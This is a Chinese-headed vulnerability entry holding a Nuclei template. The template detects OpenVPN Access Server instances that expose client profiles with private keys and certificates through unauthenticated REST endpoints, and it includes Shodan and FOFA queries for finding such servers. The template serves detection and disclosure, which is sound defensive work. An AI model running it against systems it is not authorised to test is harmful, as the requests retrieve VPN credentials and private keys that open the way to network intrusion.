漏洞描述
Detected OpenVPN Access Server with sensitive configuration data exposed, including VPN client profiles, certificates, private keys, and session tokens, without authentication.
openvpn-as-config-exposure: OpenVPN Access Server - Configuration Exposure
PoC代码[已公开]
id: openvpn-as-config-exposure
info:
name: OpenVPN Access Server - Configuration Exposure
author: 0x_Akoko
severity: high
description: |
Detected OpenVPN Access Server with sensitive configuration data exposed, including VPN client profiles, certificates, private keys, and session tokens, without authentication.
reference:
- https://openvpn.net/vpn-server-resources/access-server-rest-api/
metadata:
max-request: 2
verified: true
shodan-query: http.title:"OpenVPN Access Server"
fofa-query: title="OpenVPN Access Server"
tags: openvpn,config,exposure,misconfig,vpn
http:
- method: GET
path:
- "{{BaseURL}}/rest/GetUserlogin"
- "{{BaseURL}}/rest/GetAutologin"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/x-openvpn-profile")'
- 'contains_all(body, "-----BEGIN PRIVATE KEY-----", "-----BEGIN CERTIFICATE-----", "OVPN_ACCESS_SERVER")'
condition: and
# digest: 490a00463044022030d5c966d7cdd2c30e402069495c704874ad5ed5143b5ce5cb9d1c3d014d32750220257fff773a2c872d4fe4865fb4ece5b7359e23fb69e7248450c6959d88eca50d:922c64590222798bb761d5b6d8e72950